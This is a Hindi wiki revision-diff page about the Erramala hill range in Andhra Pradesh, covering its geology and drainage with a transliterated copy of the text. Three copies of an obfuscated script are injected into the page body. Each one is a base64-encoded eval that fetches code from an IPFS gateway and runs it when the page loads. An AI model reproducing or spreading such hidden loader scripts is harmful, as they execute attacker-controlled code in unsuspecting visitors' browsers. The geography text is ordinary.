Difference between revisions of "एरामला पर्वतमाला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*'''एरामला पर्वतमाला''' एक पर्वत श्रृंखला है जो दक्षिण [[भारत]] में पश्चिमी [[आन्ध्र प्रदेश]] राज्य में स्थित है।
+
'''एरामला पर्वतमाला''' एक पर्वत श्रृंखला है जो दक्षिण [[भारत]] में पश्चिमी [[आन्ध्र प्रदेश]] राज्य में स्थित है।
*ये पहाड़ियाँ [[दक्कन का पठार|दक्कन के पठार]] पर स्थित हैं और लगभग 54 से लेकर 50.5 करोड़ वर्ष पूर्व कैब्रियन काल की स्लेटी पत्थरों तथा स्फ़टिक (क्वार्टज़ाइट) चट्टानों से बनी हैं।  
+
*ये पहाड़ियाँ दक्कन के पठार पर स्थित हैं और लगभग 54 से लेकर 50.5 करोड़ वर्ष पूर्व कैब्रियन काल की स्लेटी पत्थरों तथा स्फ़टिक (क्वार्टज़ाइट) चट्टानों से बनी हैं।  
*एरामला पर्वतमाला में बीच-बीच में अपेक्षाकृत बाद के काल के [[लावा]] से बनी [[चट्टान|चट्टानें]] भी हैं।
+
*एरामला पर्वतमाला में बीच-बीच में अपेक्षाकृत बाद के काल के लावा से बनी चट्टानें भी हैं।
*इन पहाड़ियों का रुझान पूर्वोत्तर से दक्षिण-पश्चिम की तरफ़ है तथा इन्हें [[कुंदेरू नदी]] की सहायक नदियाँ देशांशीय पहाड़ियों और घाटियों के रूप में विभाजित करती हैं।
+
*इन पहाड़ियों का रुझान पूर्वोत्तर से दक्षिण-पश्चिम की तरफ़ है तथा इन्हें कुंदेरू नदी की सहायक नदियाँ देशांशीय पहाड़ियों और घाटियों के रूप में विभाजित करती हैं।
{{प्रचार}}
+
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 11: Line 11:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 16: Line 17:
 
{{पर्वत}}
 
{{पर्वत}}
 
{{आंध्र प्रदेश के पर्यटन स्थल}}
 
{{आंध्र प्रदेश के पर्यटन स्थल}}
[[Category:नया पन्ना]]
 
 
[[Category:पर्वत]]
 
[[Category:पर्वत]]
 
[[Category:भूगोल_कोश]]
 
[[Category:भूगोल_कोश]]
 
[[Category:आंध्र प्रदेश]]  
 
[[Category:आंध्र प्रदेश]]  
 
__INDEX__
 
__INDEX__

Latest revision as of 10:57, 9 February 2021

eramala parvatamala ek parvat shrriankhala hai jo dakshin bharat mean pashchimi andhr pradesh rajy mean sthit hai.

  • ye paha diyaan dakkan ke pathar par sthit haian aur lagabhag 54 se lekar 50.5 karo d varsh poorv kaibriyan kal ki sleti pattharoan tatha sfatik (kvartazait) chattanoan se bani haian.
  • eramala parvatamala mean bich-bich mean apekshakrit bad ke kal ke lava se bani chattanean bhi haian.
  • in paha diyoan ka rujhan poorvottar se dakshin-pashchim ki taraf hai tatha inhean kuanderoo nadi ki sahayak nadiyaan deshaanshiy paha diyoan aur ghatiyoan ke roop mean vibhajit karati haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>